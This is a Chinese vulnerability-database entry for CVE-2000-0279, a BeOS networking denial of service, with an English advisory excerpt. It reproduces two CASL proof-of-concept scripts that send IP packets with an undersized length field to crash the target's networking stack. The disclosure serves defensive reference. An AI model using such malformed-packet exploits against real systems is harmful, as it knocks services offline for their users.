BeOS IP包长度域漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105773 漏洞类型 其他
发布时间 2000-04-07 更新时间 2005-08-24
CVE编号 CVE-2000-0279 CNNVD-ID CNNVD-200004-011
漏洞平台 BeOS CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19841
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200004-011
|漏洞详情
BeOS存在漏洞,远程攻击者通过长度域少于头部的异常包触发拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/1100/info

The networking process in BeOS can crash if certain malformed packets are transmitted to it. If the length field is set to a number less than the total length of the IP and protocol (TCP or UDP) headers alone, the process will halt and require manual restarting to regain normal functionality. For TCP, the combined TCP and IP header length is 40, and for UDP the combined UDP and IP header length is 28. 

--------------becasl.casl--------------------

#!/usr/local/casl/bin/casl

    #include "tcpip.casl"
    #include "packets.casl"
    #include "tcp.casl"

    srchost = 10.0.0.1;
    dsthost = 10.0.0.2;

    IPH = copy TCPIP;
    
    IPH.ip_hl = 5;
    IPH.ip_src = srchost;
    IPH.ip_dst = dsthost;
    IPH.ip_length = 39;
    
    packet = [ IPH ];
    ip_output(packet);

--------------becasl1.casl--------------------

 #!/usr/local/casl/bin/casl

    #include "tcpip.casl"
    #include "packets.casl"
    #include "tcp.casl"

    srchost = 10.0.0.1;
    dsthost = 10.0.0.2;

    IPH = copy UDPIP;

    IPH.ip_hl = 5;
    IPH.ip_src = srchost;
    IPH.ip_dst = dsthost;
    IPH.ip_length = 27;

    packet = [ IPH ];
    ip_output(packet);
|参考资料

来源:BID
名称:1100
链接:http://www.securityfocus.com/bid/1100
来源:bebugs.be.com
链接:http://bebugs.be.com/devbugs/detail.php3?oid=2505312
来源:BUGTRAQ
名称:20000407BeOSNetworkingDOS
链接:http://archives.neohapsis.com/archives/bugtraq/2000-04/0029.html